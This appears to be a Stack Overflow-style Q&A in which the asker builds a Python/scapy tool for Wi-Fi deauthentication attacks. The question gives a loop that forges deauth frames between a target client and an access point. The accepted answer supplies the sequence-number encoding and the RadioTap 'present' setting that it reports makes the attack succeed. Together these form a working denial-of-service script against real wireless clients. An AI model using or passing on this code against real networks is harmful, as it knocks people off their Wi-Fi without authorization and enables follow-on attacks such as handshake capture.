# Adding sequence numbers to Dot11 traffic

Tags: python, scapy

I'm trying to write a tool to do simple deauth attacks. This is my work-in-progress code:

```
from scapy.all import *
from scapy.layers.dot11 import Dot11, RadioTap, Dot11Deauth
from time import sleep

AP_MAC = 'THE_VICTIM_MAC'
VICTIM_MAC = "THE_AP_MAC"

interface = "MY_INTERFACE_NAME"

def produce_deauth_pair(victim_mac: str, ap_mac: str) -> Tuple[RadioTap, RadioTap]:
    return (RadioTap() / Dot11(addr1=victim_mac, addr2=ap_mac, addr3=ap_mac) / Dot11Deauth(reason=7),
            RadioTap() / Dot11(addr1=ap_mac, addr2=victim_mac, addr3=ap_mac) / Dot11Deauth(reason=7))


for n in range(1000):
    one, two = produce_deauth_pair(VICTIM_MAC, AP_MAC)
    sendp([one, two], iface=interface, verbose=False)
    print(f"{n}/1000")
```

The main problem is, it isn't successfully causing a deauthorization on the victim machine. I started a deauth attack using `aireplay-ng`, compared the traffic in wireshark, and the main difference I can see between my traffic and theirs is theirs uses incrementing sequence numbers (`SN`), whereas mine is stuck at 0.

Theirs:
[image: aireplay-ng traffic]

I can not figure out how to specify sequence numbers though. I searched through the whole `dot11.py` scapy source file, and the only reference to "sequence numbers" I can find is in the `Dot11Auth`, and that doesn't seem right.

How can I specify a sequence number?

Answer (score 1, accepted):

It turns out, this was more me misunderstanding 802.11. Reading over [Wikipedia](https://en.wikipedia.org/wiki/IEEE_802.11#Layer_2_%E2%80%93_Datagrams):

> The Sequence Control field is a two-byte section used for identifying message order as well as eliminating duplicate frames. The first 4 bits are used for the fragmentation number, and the **last 12 bits are the sequence number**.

So, it's actually bundled inside of the `SC` field of `Dot11`.

I wrote up a simple function to produce an SC value from a fragment number and sequence number:

```
def produce_sc(frag: int, seq: int) -> int:
    return (seq << 4) + frag
```

And the result of that can be simply plugged in:

```
RadioTap() \
/ Dot11(addr1=dst_mac, addr2=src_mac, addr3=ap_mac, SC=produce_sc(0, 123)) \  # Here
/ Dot11Deauth(reason=7)
```

The deauthing still doesn't work unfortunately, but at least I ruled that cause out.

---

My original issue was the `RadioTap` header needed a `present` argument:

```
def new_deauth(dst_mac: str, src_mac: str, ap_mac: str, seq_num: int, reason: int) -> Dot11Deauth:
    sc = produce_sc(0, seq_num)
    return RadioTap(present="Rate+TXFlags") / \
           Dot11(ID=1314, addr1=dst_mac, addr2=src_mac, addr3=ap_mac, SC=sc) /\
           Dot11Deauth(reason=reason)
```

This doesn't make a ton of sense to me because I thought that the `RadioTap` header was an indication of the conditions the antenna noticed during the capture, not something that can be specified when sending, but . This successfully deauthorizes the client.

Comment: RadioTap is used to communicate with your WiFi driver. It's never actually sent. Your wifi Driver generates it on sniffing, and reads it on send. It's typically used to pass metadata, mostly when sniffing. While the format is very robust, the implementations are pretty inconsistent, especially while sending... this doesn't really surprise me

Comment: @Cukic0d Thanks, good to know. I'm curious now though what my driver decided to do differently that allowed it to work. On analysis in both Wireshark and Scapy, `present` (along with one other `RadioTap` field that I ruled out), and the sequence counter were the only differences in terms of data that I could spot between my traffic and aireplay's.

Comment: Any online information about accessing Sequence Number (wlan.seq) filed in wireshark using Scapy in python program.?

Comment: @UDITPATEL The sequence number is a part of the `sc` attribute as I showed above. You'd just need to extract it out (basically, the opposite of what I'm doing in `produce_sc`).